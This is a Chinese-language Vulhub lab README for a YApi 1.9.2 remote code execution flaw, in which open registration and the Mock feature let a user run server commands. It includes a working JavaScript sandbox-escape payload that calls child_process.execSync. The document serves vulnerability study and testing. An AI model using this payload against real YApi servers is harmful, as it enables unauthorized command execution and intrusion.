aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
63285f61aaf4501a6660be7dfe98c70135c1b89b
vulhub/yapi/unacc/README.zh-cn.md
Aaron 63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details
first commit
2025-09-06 16:08:15 +08:00

50 lines
1.1 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# YApi开放注册导致RCE
[中文版本(Chinese version)](README.zh-cn.md)
YApi是一个API管理工具。如果注册功能开放攻击者可以使用Mock功能执行任意代码。
参考链接:
- <https://paper.seebug.org/1639/>
- <https://www.freebuf.com/vuls/279967.html>
## 漏洞环境
执行如下命令启动一个YApi 1.9.2
```
docker compose up -d
```
环境启动后,访问`http://your-ip:3000`即可查看到YApi首页。
## 漏洞复现
首先,注册一个用户,并创建项目和接口:
![](1.png)
![](2.png)
接口中有一个Mock页面可以填写代码我们填写包含恶意命令的代码
```
const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("id;uname -a;pwd").toString()
```
![](3.png)
然后回到“预览”页面可以获得Mock的URL
![](4.png)
打开这个URL即可查看到命令执行的结果
![](5.png)
Reference in New Issue View Git Blame Copy Permalink